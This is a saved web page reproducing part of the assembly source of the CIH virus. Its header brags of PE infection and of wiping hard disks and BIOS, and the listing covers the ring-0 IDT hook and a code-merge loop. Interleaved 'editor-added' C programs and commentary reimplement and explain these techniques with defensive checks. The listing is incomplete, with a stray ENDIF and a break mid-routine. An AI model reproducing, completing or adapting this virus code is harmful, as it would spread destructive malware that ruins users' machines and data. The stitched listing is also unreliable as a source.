<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0027)http://hot.qd58.com/cih.htm -->
<!-- saved from url=(0038)http://grrl.myrice.com/dddd/hkwxer.htm --><HTML><HEAD><TITLE>CIH Source Code</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<META content="MSHTML 6.00.2800.1106" name=GENERATOR>
<META content=FrontPage.Editor.Document name=ProgId>
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
P {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
BR {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
A:link {
FONT-SIZE: 9pt; COLOR: #487488; TEXT-DECORATION: none
}
A:visited {
FONT-SIZE: 9pt; COLOR: #487488; TEXT-DECORATION: none
}
A:active {
FONT-SIZE: 9pt; COLOR: #487488; TEXT-DECORATION: none
}
A:hover {
COLOR: #c0c0c0; TEXT-DECORATION: none
}
TD {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
</STYLE>
<STYLE type=text/css>BODY {
SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #999999; SCROLLBAR-3DLIGHT-COLOR: #999999; SCROLLBAR-ARROW-COLOR: #999999; SCROLLBAR-TRACK-COLOR: #e8e8e8; SCROLLBAR-DARKSHADOW-COLOR: #ffffff; SCROLLBAR-BASE-COLOR: #336699
}
</STYLE>
<STYLE type=text/css>BODY {
FONT-SIZE: 12px; LINE-HEIGHT: 150%
}
</STYLE>
</HEAD>
<BODY bgColor=#e8e8e8>
<TABLE width="100%" border=0>
<TBODY>
<TR>
<TD width="100%"><FONT color=#800000>+++CIH Source Code+++</FONT></TD></TR>
<TR>
<TD><FONT
color=#808000>------------------------------------------------Anyone who likes programming is sure to find this interesting, but I myself can't program.</FONT></TD></TR>
<TR>
<TD><FONT size=2>; ****************************************************************************
<P>; * The Virus Program Information *</P>
<P>; ****************************************************************************</P>
<P>; * *</P>
<P>; * Designer : CIH Original Place : TTIT of Taiwan *</P>
<P>; * Create Date : 04/26/1998 Now Version : 1.2 *</P>
<P>; * Modification Time : 05/21/1998 *</P>
<P>; * *</P>
<P>; *==========================================================================*</P>
<P>; * Modification History *</P>
<P>; *==========================================================================*</P>
<P>; * v1.0 1. Create the Virus Program. *</P>
<P>; * 2. The Virus Modifies IDT to Get Ring0 Privilege. *</P>
<P>; * 04/26/1998 3. Virus Code doesn't Reload into System. *</P>
<P>; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. *</P>
<P>; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. *</P>
<P>; * 6. When System Opens Existing PE File, the File will be *</P>
<P>; * Infected, and the File doesn't be Reinfected. *</P>
<P>; * 7. It is also Infected, even the File is Read-Only. *</P>
<P>; * 8. When the File is Infected, the Modification Date and Time *</P>
<P>; * of the File also don't be Changed. *</P>
<P>; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call *</P>
<P>; * Previous FileSystemApiHook, it will Call the Function *</P>
<P>; * that the IFS Manager Would Normally Call to Implement *</P>
<P>; * this Particular I/O Request. *</P>
<P>; * 10. The Virus Size is only 656 Bytes. *</P>
<P>; *==========================================================================*</P>
<P>; * v1.1 1. Especially, the File that be Infected will not Increase *</P>
<P>; * it's Size... ^__^ *</P>
<P>; * 05/15/1998 2. Hook and Modify Structured Exception Handling. *</P>
<P>; * When Exception Error Occurs, Our OS System should be in *</P>
<P>; * Windows NT. So My Cute Virus will not Continue to Run, *</P>
<P>; * it will Jump to Original Application to Run. *</P>
<P>; * 3. Use Better Algorithm, Reduce Virus Code Size. *</P>
<P>; * 4. The Virus "Basic" Size is only 796 Bytes. *</P>
<P>; *==========================================================================*</P>
<P>; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... *</P>
<P>; * 2. Modify the Bug of v1.1 *</P>
<P>; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. *</P>
<P>; ****************************************************************************</P>
<P> </P>
<P>.586P</P>
<P> </P>
<P>; ****************************************************************************</P>
<P>; * Original PE Executable File(Don't Modify this Section) *</P>
<P>; ****************************************************************************</P>
<P> </P>
<P>OriginalAppEXE SEGMENT</P>
<P> </P>
<P>FileHeader:</P>
<P>db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h</P>
<P>db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h</P>
<P>db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h</P>
<P>db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh</P>
<P>db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h</P>
<P>db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h</P>
<P>db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh</P>
<P>db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh</P>
<P>db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h</P>
<P>db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah</P>
<P>db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h</P>
<P>db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h</P>
<P>db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h</P>
<P>db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h</P>
<P>db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h</P>
<P>db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h</P>
<P>db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
<P>db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h</P>
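<P>The 416 bytes above are a complete MZ/PE header for a one-section host program (the DOS stub, the "PE\0\0" signature, a PE32 optional header and a single ".text" section entry). The C program below is an editor-added example, not part of the CIH listing: it decodes those bytes with a small PE32 header reader and then computes the on-disk padding after the section's real contents (SizeOfRawData minus VirtualSize), one common measure of the cavity that a size-preserving infector of the kind described in the v1.1 notes has to fit into. The byte array is copied verbatim from the listing; the field offsets are those of the PE32 format; <code>section_slack</code> and <code>entry_file_offset</code> are this example's own checks, not routines from the virus.</P>

```c
/* Editor-added example: decode the OriginalAppEXE header bytes listed above.
 * Not part of the CIH source. Build: cc -std=c99 -Wall pehdr.c && ./a.out */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define Z8  0,0,0,0,0,0,0,0
#define Z16 Z8,Z8
/* The 416 header bytes, copied from the db lines of the listing. */
const uint8_t host_header[] = {
    0x4d,0x5a,0x90,0x00,0x03,0x00,0x00,0x00, 0x04,0x00,0x00,0x00,0xff,0xff,0x00,0x00, /* 0x000 "MZ" */
    0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00, /* 0x010 */
    Z16,                                                                             /* 0x020 */
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x00, /* 0x030 e_lfanew=0x80 */
    0x0e,0x1f,0xba,0x0e,0x00,0xb4,0x09,0xcd, 0x21,0xb8,0x01,0x4c,0xcd,0x21,0x54,0x68, /* 0x040 DOS stub */
    0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72, 0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f, /* 0x050 "is program canno" */
    0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e, 0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20, /* 0x060 "t be run in DOS " */
    0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a, 0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00, /* 0x070 "mode.\r\r\n$" */
    0x50,0x45,0x00,0x00,0x4c,0x01,0x01,0x00, 0xf1,0x68,0x20,0x35,0x00,0x00,0x00,0x00, /* 0x080 "PE", i386, 1 section */
    0x00,0x00,0x00,0x00,0xe0,0x00,0x0f,0x01, 0x0b,0x01,0x05,0x00,0x00,0x10,0x00,0x00, /* 0x090 opt hdr 0xE0, PE32 */
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x10,0x10,0x00,0x00,0x00,0x10,0x00,0x00, /* 0x0a0 entry RVA 0x1010 */
    0x00,0x20,0x00,0x00,0x00,0x00,0x40,0x00, 0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00, /* 0x0b0 base 0x400000 */
    0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00, /* 0x0c0 */
    0x00,0x20,0x00,0x00,0x00,0x02,0x00,0x00, 0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00, /* 0x0d0 SizeOfImage/Headers */
    0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00, 0x00,0x00,0x10,0x00,0x00,0x10,0x00,0x00, /* 0x0e0 stack/heap */
    0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00, Z8,                                     /* 0x0f0 16 data dirs follow */
    Z16, Z16, Z16, Z16, Z16, Z16, Z16,                                               /* 0x100..0x16f all zero */
    Z8, 0x2e,0x74,0x65,0x78,0x74,0x00,0x00,0x00,                                     /* 0x170 ".text" */
    0x00,0x10,0x00,0x00,0x00,0x10,0x00,0x00, 0x00,0x10,0x00,0x00,0x00,0x02,0x00,0x00, /* 0x180 vsize,va,raw,rawptr */
    Z8, 0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x60,                                     /* 0x190 characteristics */
};

struct pe_info {
    uint32_t e_lfanew, timestamp, entry_rva, image_base, section_align, file_align;
    uint32_t size_of_image, size_of_headers;
    uint16_t machine, nsections, opt_size, characteristics;
    char     sec_name[9];            /* first section only; this host has exactly one */
    uint32_t sec_vsize, sec_va, sec_rawsize, sec_rawptr, sec_flags;
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }

/* Returns 0 on success, -1 if buf does not hold a complete PE32 header. */
int parse_pe32(const uint8_t *buf, size_t len, struct pe_info *out)
{
    if (len < 0x40 || rd16(buf) != 0x5a4d) return -1;                      /* "MZ" */
    uint32_t pe = rd32(buf + 0x3c);
    if (pe + 0x18 + 0xe0 > len || rd32(buf + pe) != 0x00004550) return -1; /* "PE\0\0" */
    const uint8_t *fh = buf + pe + 4, *oh = fh + 20;
    out->e_lfanew = pe;
    out->machine = rd16(fh);  out->nsections = rd16(fh + 2);  out->timestamp = rd32(fh + 4);
    out->opt_size = rd16(fh + 16);  out->characteristics = rd16(fh + 18);
    if (rd16(oh) != 0x10b) return -1;                                       /* PE32 magic */
    out->entry_rva = rd32(oh + 16);   out->image_base = rd32(oh + 28);
    out->section_align = rd32(oh + 32); out->file_align = rd32(oh + 36);
    out->size_of_image = rd32(oh + 56); out->size_of_headers = rd32(oh + 60);
    const uint8_t *sh = oh + out->opt_size;                                 /* section table */
    if (out->nsections < 1 || (size_t)(sh - buf) + 40 > len) return -1;
    memcpy(out->sec_name, sh, 8); out->sec_name[8] = 0;
    out->sec_vsize = rd32(sh + 8);  out->sec_va = rd32(sh + 12);
    out->sec_rawsize = rd32(sh + 16); out->sec_rawptr = rd32(sh + 20); out->sec_flags = rd32(sh + 36);
    return 0;
}

/* On-disk bytes after the section's real contents: the cavity a size-preserving
 * infector can use without growing the file (example's own measure). */
uint32_t section_slack(const struct pe_info *pe)
{ return pe->sec_rawsize > pe->sec_vsize ? pe->sec_rawsize - pe->sec_vsize : 0; }

/* File offset of the entry point, or 0xFFFFFFFF if it is not inside the section. */
uint32_t entry_file_offset(const struct pe_info *pe)
{
    if (pe->entry_rva < pe->sec_va || pe->entry_rva - pe->sec_va >= pe->sec_rawsize) return 0xFFFFFFFFu;
    return pe->sec_rawptr + (pe->entry_rva - pe->sec_va);
}

int main(void)
{
    struct pe_info pe;
    if (parse_pe32(host_header, sizeof host_header, &pe) != 0) { puts("not a PE32 header"); return 1; }
    printf("machine %04x, %u section(s), entry RVA %08x (file offset %08x), base %08x\n",
           pe.machine, pe.nsections, pe.entry_rva, entry_file_offset(&pe), pe.image_base);
    printf("%s: vsize %x raw %x at %x flags %08x slack %u\n", pe.sec_name, pe.sec_vsize,
           pe.sec_rawsize, pe.sec_rawptr, pe.sec_flags, section_slack(&pe));
    return 0;
}
```

<P>For this host the section's VirtualSize and SizeOfRawData are both 0x1000, so the slack by that measure is zero, and the entry RVA 0x1010 maps to file offset 0x210, sixteen bytes past the start of the section's raw data. The bounds checks in <code>parse_pe32</code> are what a scanner needs and the virus omits: a truncated or malformed header fails the parse instead of being read past its end.</P>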
<P>; *********************************************************</P>
<P>HookExceptionNumber = 03h</P>
<P> </P>
<P>ENDIF</P>
<P> </P>
<P> </P>
<P>FileNameBufferSize = 7fh</P>
<P> </P>
<P>; *********************************************************</P>
<P>; *********************************************************</P>
<P> </P>
<P>VirusGame SEGMENT</P>
<P> </P>
<P>ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame</P>
<P>ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Ring3 Virus Game Initial Program *</P>
<P>; *********************************************************</P>
<P> </P>
<P>MyVirusStart:</P>
<P>push ebp</P>
<P> </P>
<P>; * IDT(Interrupt Descriptor Table) *</P>
<P>; * to Get Ring0 Privilege... *</P>
<P>; *************************************</P>
<P> </P>
<P>push eax ;</P>
<P>sidt [esp-02h] ; Get IDT Base Address</P>
<P>pop ebx ;</P>
<P> </P>
<P>add ebx, HookExceptionNumber*08h+04h ; ZF = 0</P>
<P> </P>
<P>cli</P>
<P> </P>
<P>mov ebp, [ebx] ; Get Exception Base</P>
<P>mov bp, [ebx-04h] ; Entry Point</P>
<P> </P>
<P>lea esi, MyExceptionHook-@1[ecx]</P>
<P> </P>
<P>push esi</P>
<P> </P>
<P>mov [ebx-04h], si ;</P>
<P>shr esi, 16 ; Modify Exception</P>
<P>mov [ebx+02h], si ; Entry Point Address</P>
<P> </P>
<P>pop esi</P>
<P> </P>
<P>; *************************************</P>
<P>; * Generate Exception to Get Ring0 *</P>
<P>; *************************************</P>
<P> </P>
<P>int HookExceptionNumber ; GenerateException</P>
<P>ReturnAddressOfEndException = $</P>
<P> </P>
<P>; *************************************</P>
<P>; * Merge All Virus Code Section *</P>
<P>; *************************************</P>
<P> </P>
<P>push esi</P>
<P>mov esi, eax</P>
<P> </P>
<P>LoopOfMergeAllVirusCodeSection:</P>
<P> </P>
<P>mov ecx, [eax-04h]</P>
<P> </P>
<P>rep movsb</P>
<P> </P>
<P>sub eax, 08h</P>
<P> </P>
<P>mov esi, [eax]</P>
<P> </P>
<P>or esi, esi</P>
<P>jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1</P>
<P> </P>
<P>jmp LoopOfMergeAllVirusCodeSection</P>
<P> </P>
<P>QuitLoopOfMergeAllVirusCodeSection:</P>
<P> </P>
<P>pop esi</P>
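<P>The merge loop above reads its table relative to EAX: the size of the fragment that starts at EAX itself is at [EAX-4], the address of the next fragment is at [EAX-8], its size at [EAX-12], and so on downwards until an address of zero ends the list; ESI is the copy source and EDI (set up before the loop) the destination. The C below is an editor-added example, not code from the CIH listing: it walks that same layout, with offsets into a flat <code>image</code> buffer standing in for linear addresses, and adds the bounds checks the original loop does not perform. The three fragments and their offsets are constructed sample data.</P>

```c
/* Editor-added example: LoopOfMergeAllVirusCodeSection in C, with the table
 * layout implied by the loop's reads. Not part of the CIH source. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t rd32(const uint8_t *p)
{ return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24; }
static void wr32(uint8_t *p, uint32_t v)
{ p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24); }

/* Table layout, growing downwards from `first` (the value the loop sees in EAX):
 *   [first-4]   size of fragment 0, which starts at `first` itself
 *   [first-8]   address of fragment 1,  [first-12] its size
 *   [first-16]  address of fragment 2,  [first-20] its size
 *   ...         an address of 0 terminates the list.
 * Returns the number of bytes written to dst, or -1 when a table entry would
 * read or write out of bounds (a check the original loop never makes). */
long merge_fragments(const uint8_t *image, size_t image_len, uint32_t first,
                     uint8_t *dst, size_t dst_len)
{
    uint32_t eax = first;          /* walks the table */
    uint32_t esi = first;          /* source of the current fragment */
    size_t   edi = 0;              /* bytes written so far */

    for (;;) {
        if (eax < 4 || eax > image_len) return -1;
        uint32_t ecx = rd32(image + eax - 4);            /* mov ecx, [eax-04h] */
        if (esi > image_len || ecx > image_len - esi || ecx > dst_len - edi)
            return -1;
        memcpy(dst + edi, image + esi, ecx);             /* rep movsb */
        edi += ecx;
        if (eax < 8) return -1;
        eax -= 8;                                        /* sub eax, 08h */
        esi = rd32(image + eax);                         /* mov esi, [eax] */
        if (esi == 0) break;                             /* or esi, esi / jz Quit... */
    }
    return (long)edi;
}

/* Constructed sample image (needs len >= 0x400): three fragments scattered the
 * way section padding would scatter them, and the table just below fragment 0.
 * Returns `first`, the offset of fragment 0. */
uint32_t build_sample_image(uint8_t *image, size_t len)
{
    const char    *frag[3] = { "HOOK", "DATA!!", "END" };   /* constructed */
    const uint32_t at[3]   = { 0x100, 0x200, 0x300 };       /* constructed */
    if (len < 0x400) return 0;
    memset(image, 0, len);
    for (int i = 0; i < 3; i++) memcpy(image + at[i], frag[i], strlen(frag[i]));
    uint32_t first = at[0];
    wr32(image + first - 4,  (uint32_t)strlen(frag[0]));
    wr32(image + first - 8,  at[1]); wr32(image + first - 12, (uint32_t)strlen(frag[1]));
    wr32(image + first - 16, at[2]); wr32(image + first - 20, (uint32_t)strlen(frag[2]));
    wr32(image + first - 24, 0);                              /* terminator */
    return first;
}

int main(void)
{
    uint8_t image[0x400], out[64];
    uint32_t first = build_sample_image(image, sizeof image);
    long n = merge_fragments(image, sizeof image, first, out, sizeof out);
    if (n < 0) { puts("table out of bounds"); return 1; }
    printf("merged %ld bytes: %.*s\n", n, (int)n, out);
    return 0;
}
```

<P>The copy destination (EDI) is the page the ring-0 hook allocated on the first <code>int 3</code>; here it is a plain buffer. Note that the table pointer and the size checks are all that stand between a corrupted table and an overrun of that page, which is why the example refuses any entry that does not fit.</P>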
<P> </P>
<P>; *************************************</P>
<P>; * Generate Exception Again *</P>
<P>; *************************************</P>
<P> </P>
<P>int HookExceptionNumber ; GenerateException Again</P>
<P> </P>
<P> </P>
<P>; *************************************</P>
<P>; * Let's Restore *</P>
<P>; * Structured Exception Handling *</P>
<P>; *************************************</P>
<P> </P>
<P>ReadyRestoreSE:</P>
<P>sti</P>
<P> </P>
<P>xor ebx, ebx</P>
<P> </P>
<P>jmp RestoreSE</P>
<P> </P>
<P>; *************************************</P>
<P>; * When Exception Error Occurs, *</P>
<P>; * Our OS System should be in NT. *</P>
<P>; * So My Cute Virus will not *</P>
<P>; * Continue to Run, it Jumps to *</P>
<P>; * Original Application to Run. *</P>
<P>; *************************************</P>
<P> </P>
<P>StopToRunVirusCode:</P>
<P>@1 = StopToRunVirusCode</P>
<P> </P>
<P>xor ebx, ebx</P>
<P>mov eax, fs:[ebx]</P>
<P>mov esp, [eax]</P>
<P> </P>
<P>RestoreSE:</P>
<P>pop dword ptr fs:[ebx]</P>
<P>pop eax</P>
<P> </P>
<P>; *************************************</P>
<P>; * Return Original App to Execute *</P>
<P>; *************************************</P>
<P> </P>
<P>pop ebp</P>
<P> </P>
<P>push 00401000h ; Push Original</P>
<P>OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack</P>
<P> </P>
<P>ret ; Return to Original App Entry Point</P>
<P> </P>
<P>; *********************************************************</P>
<P>; * Ring0 Virus Game Initial Program *</P>
<P>; *********************************************************</P>
<P> </P>
<P>MyExceptionHook:</P>
<P>@2 = MyExceptionHook</P>
<P> </P>
<P>jz InstallMyFileSystemApiHook</P>
<P> </P>
<P>; *************************************</P>
<P>; * Do My Virus Exist in System !? *</P>
<P>; *************************************</P>
<P> </P>
<P>mov ecx, dr0</P>
<P>jecxz AllocateSystemMemoryPage</P>
<P> </P>
<P>add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException</P>
<P> </P>
<P>; *************************************</P>
<P>; * Return to Ring3 Initial Program *</P>
<P>; *************************************</P>
<P> </P>
<P>ExitRing0Init:</P>
<P>mov [ebx-04h], bp ;</P>
<P>shr ebp, 16 ; Restore Exception</P>
<P>mov [ebx+02h], bp ;</P>
<P> </P>
<P>iretd</P>
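<P>The Ring3 stub and ExitRing0Init above are two halves of one trick. <code>sidt [esp-02h]</code> stores the 6-byte IDTR (16-bit limit, then 32-bit base) so that the base lands at [ESP] and is popped into EBX; <code>add ebx, HookExceptionNumber*08h+04h</code> then points EBX at the middle of the 8-byte gate for INT 3, where [EBX-4] is the low word of the handler offset and [EBX+2] the high word. <code>mov ebp,[ebx]</code> followed by <code>mov bp,[ebx-04h]</code> reassembles the original handler in EBP, the two word writes redirect the gate to MyExceptionHook, and the <code>int 3</code> enters it at ring 0; ExitRing0Init writes EBP back with the same two stores before <code>iretd</code>. This works on Windows 95/98 because the IDT page is writable from ring 3 there and the INT 3 gate is DPL 3. The <code>add</code> also leaves ZF clear, while the merge loop's exit leaves ZF set, which is what the <code>jz InstallMyFileSystemApiHook</code> at MyExceptionHook distinguishes, since entering through an interrupt gate preserves ZF. The C below is an editor-added example, not code from the CIH listing: it models a 256-entry IDT as an array, performs the hook and restore with exactly those word-sized accesses, and adds a defender-side check that a gate still points into an expected handler range. The selector, gate types and handler addresses are constructed sample values.</P>

```c
/* Editor-added example: the IDT gate rewrite of the Ring3 stub and the
 * ExitRing0Init restore, modelled on an in-memory IDT. Not part of the CIH source. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#pragma pack(push, 1)
struct idt_gate {                 /* 8-byte 32-bit gate descriptor as the CPU defines it */
    uint16_t offset_lo;           /* bytes 0..1: handler offset bits 0..15  */
    uint16_t selector;            /* bytes 2..3: code segment selector       */
    uint8_t  reserved;            /* byte  4                                 */
    uint8_t  type_attr;           /* byte  5: P, DPL, gate type              */
    uint16_t offset_hi;           /* bytes 6..7: handler offset bits 16..31  */
};
#pragma pack(pop)

#define HOOK_EXCEPTION_NUMBER 3   /* HookExceptionNumber = 03h in the listing */

/* EBX in the listing: IDT base + vector*8 + 4, the middle of the gate. */
static uint8_t *gate_mid(struct idt_gate *idt, unsigned vector)
{ return (uint8_t *)idt + vector * 8u + 4u; }

/* mov ebp,[ebx] ; mov bp,[ebx-04h]  ->  full 32-bit handler address */
uint32_t gate_handler(struct idt_gate *idt, unsigned vector)
{
    uint8_t *ebx = gate_mid(idt, vector);
    uint32_t ebp; uint16_t bp;
    memcpy(&ebp, ebx, 4);                 /* reserved, type_attr, offset_hi */
    memcpy(&bp, ebx - 4, 2);              /* offset_lo replaces the low word */
    return (ebp & 0xFFFF0000u) | bp;
}

/* Redirect `vector` to `handler` with the listing's two word stores; the
 * selector and type bytes in between are untouched. Returns the old handler (EBP). */
uint32_t hook_vector(struct idt_gate *idt, unsigned vector, uint32_t handler)
{
    uint8_t *ebx = gate_mid(idt, vector);
    uint32_t previous = gate_handler(idt, vector);
    uint16_t si = (uint16_t)handler;
    memcpy(ebx - 4, &si, 2);              /* mov [ebx-04h], si */
    si = (uint16_t)(handler >> 16);       /* shr esi, 16 */
    memcpy(ebx + 2, &si, 2);              /* mov [ebx+02h], si */
    return previous;
}

/* ExitRing0Init: put the saved EBP back with the same two stores. */
void restore_vector(struct idt_gate *idt, unsigned vector, uint32_t saved_ebp)
{ (void)hook_vector(idt, vector, saved_ebp); }

/* Defender-side check on a dumped IDT: does the gate still point into the
 * range where the kernel's handlers are expected? Bounds are the caller's assumption. */
int gate_in_range(struct idt_gate *idt, unsigned vector, uint32_t lo, uint32_t hi)
{
    uint32_t h = gate_handler(idt, vector);
    return h >= lo && h <= hi;
}

/* Constructed sample IDT: handlers in a pretend kernel range; INT 3 is DPL 3
 * (so a ring-3 `int 3` is allowed), every other gate DPL 0. */
struct idt_gate sample_idt[256];

void init_sample_idt(void)
{
    for (unsigned v = 0; v < 256; v++) {
        uint32_t handler = 0xC0001000u + v * 0x20u;       /* constructed */
        sample_idt[v].offset_lo = (uint16_t)handler;
        sample_idt[v].selector  = 0x28;                   /* constructed ring-0 code selector */
        sample_idt[v].reserved  = 0;
        sample_idt[v].type_attr = (v == 3) ? 0xEE : 0x8E; /* P=1, DPL 3 or 0, 32-bit interrupt gate */
        sample_idt[v].offset_hi = (uint16_t)(handler >> 16);
    }
}

int main(void)
{
    init_sample_idt();
    uint32_t ebp = hook_vector(sample_idt, HOOK_EXCEPTION_NUMBER, 0x00401234u); /* constructed ring-3 address */
    printf("int %d: %08x -> %08x, in kernel range: %d\n", HOOK_EXCEPTION_NUMBER, ebp,
           gate_handler(sample_idt, HOOK_EXCEPTION_NUMBER),
           gate_in_range(sample_idt, HOOK_EXCEPTION_NUMBER, 0xC0000000u, 0xFFFFFFFFu));
    restore_vector(sample_idt, HOOK_EXCEPTION_NUMBER, ebp);
    printf("restored: %08x\n", gate_handler(sample_idt, HOOK_EXCEPTION_NUMBER));
    return 0;
}
```

<P>Between the hook and the restore the gate's selector and type bytes never change, which is why the listing can get away with two 16-bit stores and never touches [EBX] to [EBX+1]. The <code>gate_in_range</code> check is the kind of thing an integrity monitor runs over a dumped IDT: a ring-0 gate whose handler sits in a user-mode image is the visible trace of this technique.</P>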
<P> </P>
<P>; *************************************</P>
<P>; * Allocate SystemMemory Page to Use *</P>
<P>; *************************************</P>
<P> </P>
<P>AllocateSystemMemoryPage:</P>
<P> </P>
<P>mov dr0, ebx ; Set the Mark of My Virus Exist in System</P>
<P> </P>
<P>push 00000000fh ;</P>
<P>push ecx ;</P>
<P>push 0ffffffffh ;</P>
<P>push ecx ;</P>
<P>push ecx ;</P>
<P>push ecx ;</P>